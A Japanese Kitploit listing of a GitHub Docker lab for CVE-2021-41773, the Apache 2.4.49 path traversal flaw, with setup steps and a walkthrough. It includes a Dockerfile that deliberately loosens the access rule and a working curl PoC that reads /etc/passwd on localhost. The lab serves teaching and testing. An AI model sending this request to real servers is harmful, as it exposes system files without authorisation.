Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-41773 — Docker ベースのラボ環境で、CVE-2021-41773 Apache パストラバーサル脆弱性を対象とし、PoC エクスプロイトと詳細なウォークスルーを提供します。セキュリティテストおよび教育用です。 | Kitploit
ツール/GitHubGitHub/jiyun02/cve-2021-41773
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Docker ベースのラボ環境で、CVE-2021-41773 Apache パストラバーサル脆弱性を対象とし、PoC エクスプロイトと詳細なウォークスルーを提供します。セキュリティテストおよび教育用です。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 – Apache パス・トラバーサル レポート


概要

  • Apache HTTP Server 2.4.49 バージョンで発見された脆弱性で、Webサーバーの設定によりパス・トラバーサル攻撃を介してシステムの機密ファイルを公開できる
  • パス・トラバーサル: 攻撃者が ../ を含むパスを使用してWebルート外のファイルにアクセスできる

情報

  • 脆弱性名: CVE-2021-41773
  • 影響を受けるバージョン: Apache HTTP Server 2.4.49
  • 脆弱性タイプ: パス・トラバーサル
  • 公式パッチの有無: 2.4.50 以上でパッチ済み

実践環境構成

  • Base Image : 'httpd:2.4.49' (DockerHub)
  • コンテナ起動方法 : Dockerfile + docker-compose.yml
  • 実行ポート : 8080 → コンテナの80ポートにマッピング
  • Apache設定変更 : 'Require all granted' に変更 (パス・トラバーサルを可能にする)

環境の実行方法

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

脆弱性 PoC

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

詳細手順

  1. 課題用のディレクトリを実行 image
image
  1. Dockerfileの作成 image

-> Base Image: httpd:2.4.49 (脆弱性が存在するバージョン)

-> 'sed -i 's/Require all denied/Require all granted/g' : パス・トラバーサルを許可し、外部アクセスを可能にする

  1. docker-compose.yml image

-> Apache の定義

-> 8080 ポートをコンテナの 80 ポートにマッピング

  1. Docker の実行

    image
  2. PoCの実行

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd は機密情報を含んでいる。%2e は .. のエンコードされた表現であり、上位ディレクトリへ移動するコマンドである。

-> パスを操作してサーバーが /etc/passwd にアクセスし、その内容を出力させる。

  1. 実行結果 image

-> 上記の画像のように機密ディレクトリにアクセス可能


Fork を介してアクセス可能なリポジトリ URL

https://github.com/JIYUN02/cve-2021-41773

-> コミット履歴あり

ツールをダウンロード